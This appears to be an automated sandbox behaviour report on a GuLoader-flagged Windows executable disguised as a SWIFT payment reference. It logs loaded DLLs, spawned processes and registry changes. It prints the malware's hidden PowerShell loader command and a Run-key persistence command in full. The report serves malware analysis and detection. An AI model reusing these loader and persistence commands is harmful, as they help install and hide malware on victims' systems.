Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"

Source: classification engine

Classification label: mal100.troj.winEXE@13/11@1/1

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		7_2_004034F7

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404954

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

File created: C:\Users\user\Pictures\timetallenes.lnk

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

File created: C:\Users\user\AppData\Local\Temp\nsd14E9.tmp

Jump to behavior

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

File read: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exe
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"	Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: timetallenes.lnk.0.dr	LNK file: ..\..\..\Program Files (x86)\Common Files\Tankvognskrselsulykke.geo
Source: sans.lnk.0.dr	LNK file: ..\..\Users\user\AppData\Local\Temp\truede.une
Source: timetallenes.lnk0.0.dr	LNK file: ..\..\..\Program Files (x86)\Common Files\Tankvognskrselsulykke.geo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2599516690.0000000008435000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbN source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2596714001.00000000070C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07387739 push 8B059E24h; iretd	1_2_0738774E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_073875E6 pushad ; ret	1_2_073875E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0738F934 push es; iretd	1_2_0738F937

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Vitis.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bortopereringer			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bortopereringer			Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
